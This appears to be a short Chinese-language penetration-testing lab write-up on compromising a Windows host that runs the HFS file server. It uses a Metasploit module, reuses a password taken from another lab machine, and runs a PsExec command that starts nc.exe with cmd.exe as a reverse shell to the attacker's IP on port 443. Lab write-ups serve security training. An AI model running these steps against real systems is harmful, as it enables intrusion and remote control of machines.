nmap快速扫描结果并不准确!需要对所有端口进行扫描

发现存在9505端口。

浏览器直接访问,发现存在HFS文件分享系统。

MSF现成利用脚本 windows/http/rejetto_hfs_exec

目标机器打开了防火墙,所以记得把LPORT改成443

可以得到地权限的shell

net user 查看一下存在的用户,发现存在alice。

而alice是实验室的地一台机子且已经被我们拿下,已知那台机子alice的密码是aliceishere,可能这台机子上也是这个密码。

我们向目标机器上传PsExec.exe文件和nc.exe    link: PsExec  nc

  • PsExec.exe -accpeteula \\Bethany2 -ua alice -pa aliceishere C:\HFS\nc.exe -vn 10.11.0.94 443 -e cmd.exe

shell get √

proof.txt 1f1f1eb58e44d5d24e44070b3b29c0d5